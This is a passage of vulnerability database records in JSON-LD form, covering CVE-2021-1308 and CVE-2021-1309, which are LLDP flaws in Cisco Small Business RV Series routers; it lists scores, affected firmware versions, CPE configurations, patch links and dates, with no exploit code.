                  availabilityImpact: "COMPLETE",
                  baseScore: 6.1,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 6.5,
                  id: "CNVD-2021-35514",
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  severity: "MEDIUM",
                  trust: 0.6,
                  vectorString: "AV:A/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "ADJACENT_NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 7.4,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 2.8,
                  impactScore: 4,
                  integrityImpact: "NONE",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  trust: 2,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Adjacent Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 7.4,
                  baseSeverity: "High",
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2021-1308",
                  impactScore: null,
                  integrityImpact: "None",
                  privilegesRequired: "None",
                  scope: "Changed",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2021-1308",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "ykramarz@cisco.com",
                  id: "CVE-2021-1308",
                  trust: 1,
                  value: "HIGH",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2021-35514",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-202104-434",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "VULMON",
                  id: "CVE-2021-1308",
                  trust: 0.1,
                  value: "MEDIUM",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-35514",
         },
         {
            db: "VULMON",
            id: "CVE-2021-1308",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005371",
         },
         {
            db: "NVD",
            id: "CVE-2021-1308",
         },
         {
            db: "NVD",
            id: "CVE-2021-1308",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-434",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent)",
      sources: [
         {
            db: "NVD",
            id: "CVE-2021-1308",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005371",
         },
         {
            db: "CNVD",
            id: "CNVD-2021-35514",
         },
         {
            db: "VULMON",
            id: "CVE-2021-1308",
         },
      ],
      trust: 2.25,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2021-1308",
            trust: 3.9,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005371",
            trust: 0.8,
         },
         {
            db: "CNVD",
            id: "CNVD-2021-35514",
            trust: 0.6,
         },
         {
            db: "AUSCERT",
            id: "ESB-2021.1171.3",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-434",
            trust: 0.6,
         },
         {
            db: "VULMON",
            id: "CVE-2021-1308",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-35514",
         },
         {
            db: "VULMON",
            id: "CVE-2021-1308",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005371",
         },
         {
            db: "NVD",
            id: "CVE-2021-1308",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-434",
         },
      ],
   },
   id: "VAR-202104-0380",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-35514",
         },
      ],
      trust: 1.1394850175,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-35514",
         },
      ],
   },
   last_update_date: "2023-12-18T13:17:53.268000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "cisco-sa-rv-multi-lldp-u7e4chCe",
            trust: 0.8,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-multi-lldp-u7e4chce",
         },
         {
            title: "Patch for Cisco Link Layer Discovery Protocol buffer overflow vulnerability (CNVD-2021-35514)",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/265676",
         },
         {
            title: "Cisco Link Layer Discovery Protocol Buffer error vulnerability fix",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=147016",
         },
         {
            title: "Cisco: Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
            trust: 0.1,
            url: "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts&qid=cisco-sa-rv-multi-lldp-u7e4chce",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-35514",
         },
         {
            db: "VULMON",
            id: "CVE-2021-1308",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005371",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-434",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-401",
            trust: 1,
         },
         {
            problemtype: "Buffer error (CWE-119) [ Other ]",
            trust: 0.8,
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2021-005371",
         },
         {
            db: "NVD",
            id: "CVE-2021-1308",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 2.4,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-multi-lldp-u7e4chce",
         },
         {
            trust: 2,
            url: "https://nvd.nist.gov/vuln/detail/cve-2021-1308",
         },
         {
            trust: 0.6,
            url: "https://www.auscert.org.au/bulletins/esb-2021.1171.3",
         },
         {
            trust: 0.1,
            url: "https://cwe.mitre.org/data/definitions/119.html",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-35514",
         },
         {
            db: "VULMON",
            id: "CVE-2021-1308",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005371",
         },
         {
            db: "NVD",
            id: "CVE-2021-1308",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-434",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CNVD",
            id: "CNVD-2021-35514",
         },
         {
            db: "VULMON",
            id: "CVE-2021-1308",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005371",
         },
         {
            db: "NVD",
            id: "CVE-2021-1308",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-434",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2021-05-19T00:00:00",
            db: "CNVD",
            id: "CNVD-2021-35514",
         },
         {
            date: "2021-04-08T00:00:00",
            db: "VULMON",
            id: "CVE-2021-1308",
         },
         {
            date: "2021-12-13T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2021-005371",
         },
         {
            date: "2021-04-08T04:15:11.983000",
            db: "NVD",
            id: "CVE-2021-1308",
         },
         {
            date: "2021-04-07T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202104-434",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2021-05-19T00:00:00",
            db: "CNVD",
            id: "CNVD-2021-35514",
         },
         {
            date: "2021-04-15T00:00:00",
            db: "VULMON",
            id: "CVE-2021-1308",
         },
         {
            date: "2021-12-13T09:08:00",
            db: "JVNDB",
            id: "JVNDB-2021-005371",
         },
         {
            date: "2023-11-07T03:27:55.717000",
            db: "NVD",
            id: "CVE-2021-1308",
         },
         {
            date: "2022-08-08T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202104-434",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote or local",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202104-434",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Cisco Small Business RV  Buffer error vulnerability in series routers",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2021-005371",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "buffer error",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202104-434",
         },
      ],
      trust: 0.6,
   },
}

var-202104-0381
Vulnerability from variot

Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent)

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0381",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "rv345",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv345p",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv132w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv260w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv340w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv340w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv132w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv260",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv260",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv345p",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv134w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv340",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv160w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv260p",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv160",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv345",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv260w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv134w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv345",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv260w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv345p",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv134w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv160w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv340",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv340",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv340w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv160w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv260p",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv132w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv260",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv260p",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv160",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv160",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv345 dual wan gigabit vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv160 vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260p vpn router with poe",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260w wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260 vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "cisco rv134w vdsl2 wireless-ac vpn ルータ",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340 dual wan gigabit vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv160w wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "cisco rv132w adsl2+ wireless-n vpn ルータ",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv345p dual wan gigabit poe vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340w dual wan gigabit wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "link layer discovery protocol",
            scope: null,
            trust: 0.6,
            vendor: "cisco",
            version: null,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-35515",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005331",
         },
         {
            db: "NVD",
            id: "CVE-2021-1309",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv132w_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv132w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv132w_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv132w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv134w_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv134w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv134w_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv134w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160w_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160w_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260p_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260p_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260p_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260w_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260w_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340w_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340w_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345p_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345p_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345p_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2021-1309",
         },
      ],
   },
   cve: "CVE-2021-1309",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
